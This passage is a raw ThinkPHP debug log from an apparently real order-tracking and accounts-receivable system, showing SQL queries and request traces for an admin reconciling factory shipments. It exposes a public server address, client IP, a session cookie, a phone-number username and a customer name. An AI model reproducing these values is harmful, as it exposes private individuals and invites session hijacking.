kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,outbound.id AS outbound__id,outbound.number AS outbound__number,outbound.kehu_id AS outbound__kehu_id,outbound.total_money AS outbound__total_money,outbound.buildstaff_id AS outbound__buildstaff_id,outbound.staffinfo_id AS outbound__staffinfo_id,outbound.factorymge_id AS outbound__factorymge_id,outbound.complete_status AS outbound__complete_status,outbound.admin_id AS outbound__admin_id,outbound.is_print AS outbound__is_print,outbound.createtime AS outbound__createtime,outbound.updatetime AS outbound__updatetime FROM `ot_outboundandorder` `outboundandorder` LEFT JOIN `ot_orderinfo` `orderinfo` ON `outboundandorder`.`orderinfo_id`=`orderinfo`.`id` LEFT JOIN `ot_productinfo` `productinfo` ON `outboundandorder`.`productinfo_id`=`productinfo`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outboundandorder`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `outboundandorder`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_outbound` `outbound` ON `outboundandorder`.`outbound_id`=`outbound`.`id` WHERE `outbound`.`id` = '11826' [ RunTime:0.014049s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=5000,`price`=2.52,`money`=12600 WHERE `id` = 27802 [ RunTime:0.004238s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountsreceivable` [ RunTime:0.000782s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000323s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (164 , 40 , 53550 , 1105 , 11826 , 27802 , 1 , 2025 , 12 , 14 , '100W-1底壳5000个' , 1765702738 , 12600 , 11080005.790661) [ RunTime:0.006777s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=5000,`price`=0.6,`money`=3000 WHERE `id` = 27803 [ RunTime:0.005046s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000351s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (164 , 40 , 53551 , 1106 , 11826 , 27803 , 1 , 2025 , 12 , 14 , '100W-1上盖5000个' , 1765702738 , 3000 , 11083005.790661) [ RunTime:0.004728s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=5376,`price`=1.27,`money`=6827.52 WHERE `id` = 27804 [ RunTime:0.005634s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000626s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (164 , 40 , 53552 , 2083 , 11826 , 27804 , 1 , 2025 , 12 , 14 , '20W-4底壳1.0厚5376个' , 1765702738 , 6827.52 , 11089833.310661) [ RunTime:0.005238s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=5376,`price`=0.4,`money`=2150.4 WHERE `id` = 27805 [ RunTime:0.005023s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000381s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (164 , 40 , 53553 , 1130 , 11826 , 27805 , 1 , 2025 , 12 , 14 , '20W-5锌盖5376个' , 1765702738 , 2150.4 , 11091983.710661) [ RunTime:0.005621s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=3514,`price`=3.72,`money`=13072.08 WHERE `id` = 27806 [ RunTime:0.005114s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000291s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (164 , 40 , 53554 , 3002 , 11826 , 27806 , 1 , 2025 , 12 , 14 , '小400W底壳3514个' , 1765702738 , 13072.08 , 11105055.790661) [ RunTime:0.006078s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=3514,`price`=1,`money`=3514 WHERE `id` = 27807 [ RunTime:0.006703s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000569s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (164 , 40 , 53555 , 3003 , 11826 , 27807 , 1 , 2025 , 12 , 14 , '小400W上盖3514个' , 1765702738 , 3514 , 11108569.790661) [ RunTime:0.004437s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=15752,`price`=0.04,`money`=630.08 WHERE `id` = 27808 [ RunTime:0.004329s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000427s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (164 , 40 , 53627 , 1022 , 11826 , 27808 , 1 , 2025 , 12 , 14 , '大弯压板15752个' , 1765702738 , 630.08 , 11109199.870661) [ RunTime:0.004376s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=12028,`price`=0.04,`money`=481.12 WHERE `id` = 27809 [ RunTime:0.005053s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000529s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (164 , 40 , 53628 , 1021 , 11826 , 27809 , 1 , 2025 , 12 , 14 , '大平压板12028个' , 1765702738 , 481.12 , 11109680.990661) [ RunTime:0.014885s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001000s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('跟单系统 财务管理 校对应收账款 核对' , '{\"dialog\":\"1\",\"kehu_id\":[\"\\u738b\\u96f7\",\"164\"],\"verify_amount\":[\"5000\",\"5000\",\"5376\",\"5376\",\"3514\",\"3514\",\"15752\",\"12028\"],\"price\":[\"2.52\",\"0.6000000000\",\"1.27\",\"0.4000000000\",\"3.72\",\"1.0000000000\",\"0.0400000000\",\"0.0400000000\"],\"money\":[\"12600\",\"3000.0000000000\",\"6827.52\",\"2150.4000000000\",\"13072.08\",\"3514.0000000000\",\"630.0800000000\",\"481.1200000000\"],\"explain\":[\"100W-1\\u5e95\\u58f35000\\u4e2a\",\"100W-1\\u4e0a\\u76d65000\\u4e2a\",\"20W-4\\u5e95\\u58f31.0\\u539a5376\\u4e2a\",\"20W-5\\u950c\\u76d65376\\u4e2a\",\"\\u5c0f400W\\u5e95\\u58f33514\\u4e2a\",\"\\u5c0f400W\\u4e0a\\u76d63514\\u4e2a\",\"\\u5927\\u5f2f\\u538b\\u677f15752\\u4e2a\",\"\\u5927\\u5e73\\u538b\\u677f12028\\u4e2a\"],\"shoukuan_status-1\":\"0\",\"shoukuan_status-2\":\"0\",\"shoukuan_status-3\":\"0\",\"shoukuan_status-4\":\"0\",\"shoukuan_status-5\":\"0\",\"shoukuan_status-6\":\"0\",\"shoukuan_status-7\":\"0\",\"shoukuan_status-8\":\"0\",\"ids\":\"11826\"}' , '/admin/financial/verifybill/hedui/ids/11826?dialog=1' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.204.117' , 1765702738) [ RunTime:0.006062s ] --------------------------------------------------------------- [ 2025-12-14T16:58:58+08:00 ] 106.112.204.117 GET /admin/financial/verifybill/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22start_time%22%3A%222025-11-14+00%3A00%3A00%22%2C%22end_time%22%3A%222025-12-14+23%3A59%3A59%22%7D&op=%7B%22start_time%22%3A%22%3D%22%2C%22end_time%22%3A%22%3D%22%7D&_=1765701970989 [ info ] 47.105.33.115:8081/admin/financial/verifybill/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22start_time%22%3A%222025-11-14+00%3A00%3A00%22%2C%22end_time%22%3A%222025-12-14+23%3A59%3A59%22%7D&op=%7B%22start_time%22%3A%22%3D%22%2C%22end_time%22%3A%22%3D%22%7D&_=1765701970989 [运行时间:0.266543s][吞吐率:3.75req/s] [内存消耗:5,705.73kb] [文件加载:88] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000047s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001427s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.verifybill', 2 => 'index', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/json', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'sort' => 'id', 'order' => 'desc', 'offset' => '0', 'limit' => '10', 'filter' => '{"start_time":"2025-11-14 00:00:00","end_time":"2025-12-14 23:59:59"}', 'op' => '{"start_time":"=","end_time":"="}', '_' => '1765701970989', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001753s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Verifybill->index[ /alidata/www/gendan/application/admin/controller/financial/Verifybill.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000128s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000468s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000971s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000491s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001045s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001443s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001265s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000450s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.001241s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000767s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.000788s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM ( SELECT `outbound`.`id`,`outbound`.`number`,`outbound`.`kehu_id`,`outbound`.`total_money`,`outbound`.`buildstaff_id`,`outbound`.`staffinfo_id`,`outbound`.`factorymge_id`,`outbound`.`complete_status`,`outbound`.`admin_id`,`outbound`.`is_print`,`outbound`.`createtime`,`outbound`.`updatetime`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,outboundandorder.id AS outboundandorder__id,outboundandorder.outbound_id AS outboundandorder__outbound_id,outboundandorder.orderinfo_id AS outboundandorder__orderinfo_id,outboundandorder.kehu_id AS outboundandorder__kehu_id,outboundandorder.amount AS outboundandorder__amount,outboundandorder.money AS outboundandorder__money,outboundandorder.price AS outboundandorder__price,outboundandorder.productinfo_id AS outboundandorder__productinfo_id,outboundandorder.factorymge_id AS outboundandorder__factorymge_id,outboundandorder.staffinfo_id AS outboundandorder__staffinfo_id,outboundandorder.admin_id AS outboundandorder__admin_id,outboundandorder.createtime AS outboundandorder__createtime,outboundandorder.updatetime AS outboundandorder__updatetime,outboundandorder.verify_status AS outboundandorder__verify_status,outboundandorder.verify_amount AS outboundandorder__verify_amount,count(*) FROM `ot_outbound` `outbound` LEFT JOIN `ot_factorymge` `factorymge` ON `outbound`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outbound`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_outboundandorder` `outboundandorder` ON `outbound`.`id`=`outboundandorder`.`outbound_id` WHERE ( outbound.createtime > 1763049600 ) AND ( outbound.createtime <= 1765727999 ) AND `outboundandorder`.`verify_status` = 0 AND `outbound`.`factorymge_id` = '40' GROUP BY `outbound`.`id` ORDER BY `outbound`.`id` DESC ) `_group_count_` LIMIT 1 [ RunTime:0.021577s ] [ sql ] [ SQL ] SELECT `outbound`.`id`,`outbound`.`number`,`outbound`.`kehu_id`,`outbound`.`total_money`,`outbound`.`buildstaff_id`,`outbound`.`staffinfo_id`,`outbound`.`factorymge_id`,`outbound`.`complete_status`,`outbound`.`admin_id`,`outbound`.`is_print`,`outbound`.`createtime`,`outbound`.`updatetime`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,outboundandorder.id AS outboundandorder__id,outboundandorder.outbound_id AS outboundandorder__outbound_id,outboundandorder.orderinfo_id AS outboundandorder__orderinfo_id,outboundandorder.kehu_id AS outboundandorder__kehu_id,outboundandorder.amount AS outboundandorder__amount,outboundandorder.money AS outboundandorder__money,outboundandorder.price AS outboundandorder__price,outboundandorder.productinfo_id AS outboundandorder__productinfo_id,outboundandorder.factorymge_id AS outboundandorder__factorymge_id,outboundandorder.staffinfo_id AS outboundandorder__staffinfo_id,outboundandorder.admin_id AS outboundandorder__admin_id,outboundandorder.createtime AS outboundandorder__createtime,outboundandorder.updatetime AS outboundandorder__updatetime,outboundandorder.verify_status AS outboundandorder__verify_status,outboundandorder.verify_amount AS outboundandorder__verify_amount FROM `ot_outbound` `outbound` LEFT JOIN `ot_factorymge` `factorymge` ON `outbound`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outbound`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_outboundandorder` `outboundandorder` ON `outbound`.`id`=`outboundandorder`.`outbound_id` WHERE `outboundandorder`.`verify_status` = 0 AND ( outbound.createtime > 1763049600 ) AND ( outbound.createtime <= 1765727999 ) AND `outbound`.`factorymge_id` = '40' GROUP BY `outbound`.`id` ORDER BY `outbound`.`id` DESC LIMIT 0,10 [ RunTime:0.021551s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11825 [ RunTime:0.014142s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11824 [ RunTime:0.014279s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11823 [ RunTime:0.014596s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11822 [ RunTime:0.013774s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11821 [ RunTime:0.014375s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11820 [ RunTime:0.014632s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11819 [ RunTime:0.014944s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11814 [ RunTime:0.014748s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11813 [ RunTime:0.014610s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11812 [ RunTime:0.014821s ] --------------------------------------------------------------- [ 2025-12-14T16:59:00+08:00 ] 106.112.204.117 GET /admin/financial/verifybill/hedui/ids/11825?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11825?dialog=1 [运行时间:0.076842s][吞吐率:13.01req/s] [内存消耗:6,103.55kb] [文件加载:89] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001138s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.verifybill', 2 => 'hedui', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'upgrade-insecure-requests' => '1', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'dialog' => '1', 'ids' => '11825', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001500s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Verifybill->hedui[ /alidata/www/gendan/application/admin/controller/financial/Verifybill.php ] [ info ] [ VIEW ] /alidata/www/gendan/public/../application/admin/view/financial/verifybill/hedui.html [ array ( 0 => 'breadcrumb', 1 => 'site', 2 => 'config', 3 => 'auth', 4 => 'admin', 5 => 'adminid', 6 => 'faccount', 7 => 'shoukuanStatusList', 8 => 'start_time', 9 => 'end_time', 10 => 'total', 11 => 'outbound', 12 => 'rows', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000100s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000499s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000699s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000444s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.000911s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001545s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000837s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000399s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.000801s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.000904s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000890s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000692s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.000644s ] [ sql ] [ SQL ] SELECT `outboundandorder`.`id`,`outboundandorder`.`outbound_id`,`outboundandorder`.`orderinfo_id`,`outboundandorder`.`kehu_id`,`outboundandorder`.`amount`,`outboundandorder`.`money`,`outboundandorder`.`price`,`outboundandorder`.`productinfo_id`,`outboundandorder`.`factorymge_id`,`outboundandorder`.`staffinfo_id`,`outboundandorder`.`admin_id`,`outboundandorder`.`createtime`,`outboundandorder`.`updatetime`,`outboundandorder`.`verify_status`,`outboundandorder`.`verify_amount`,orderinfo.id AS orderinfo__id,orderinfo.nei_number AS orderinfo__nei_number,orderinfo.number AS orderinfo__number,orderinfo.pid AS orderinfo__pid,orderinfo.order_company AS orderinfo__order_company,orderinfo.order_connect AS orderinfo__order_connect,orderinfo.order_phone AS orderinfo__order_phone,orderinfo.kehu_id AS orderinfo__kehu_id,orderinfo.price AS orderinfo__price,orderinfo.material_id AS orderinfo__material_id,orderinfo.pProductinfo_id AS orderinfo__pProductinfo_id,orderinfo.productinfo_id AS orderinfo__productinfo_id,orderinfo.order_type AS orderinfo__order_type,orderinfo.order_status AS orderinfo__order_status,orderinfo.all_order_status AS orderinfo__all_order_status,orderinfo.shengchan_status AS orderinfo__shengchan_status,orderinfo.zuixinshuoming AS orderinfo__zuixinshuoming,orderinfo.guzhangshu AS orderinfo__guzhangshu,orderinfo.zuixinguzhang AS orderinfo__zuixinguzhang,orderinfo.techprocess_id AS orderinfo__techprocess_id,orderinfo.actual_amount AS orderinfo__actual_amount,orderinfo.kucun_amount AS orderinfo__kucun_amount,orderinfo.produce_amount AS orderinfo__produce_amount,orderinfo.produced_amount AS orderinfo__produced_amount,orderinfo.waste_amount AS orderinfo__waste_amount,orderinfo.produced_time AS orderinfo__produced_time,orderinfo.send_amount AS orderinfo__send_amount,orderinfo.ruku_posi AS orderinfo__ruku_posi,orderinfo.sent_amount AS orderinfo__sent_amount,orderinfo.out_time AS orderinfo__out_time,orderinfo.build_order_staffid AS orderinfo__build_order_staffid,orderinfo.factorymge_id AS orderinfo__factorymge_id,orderinfo.admin_id AS orderinfo__admin_id,orderinfo.remind_day AS orderinfo__remind_day,orderinfo.build_time AS orderinfo__build_time,orderinfo.end_time AS orderinfo__end_time,orderinfo.responsible_staffinfos AS orderinfo__responsible_staffinfos,orderinfo.responsible_staffinfovars AS orderinfo__responsible_staffinfovars,orderinfo.feedback AS orderinfo__feedback,orderinfo.guoqitime AS orderinfo__guoqitime,orderinfo.guoqi_status AS orderinfo__guoqi_status,orderinfo.put_position AS orderinfo__put_position,orderinfo.createtime AS orderinfo__createtime,orderinfo.updatetime AS orderinfo__updatetime,orderinfo.is_modify AS orderinfo__is_modify,orderinfo.purchaseorder_id AS orderinfo__purchaseorder_id,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS 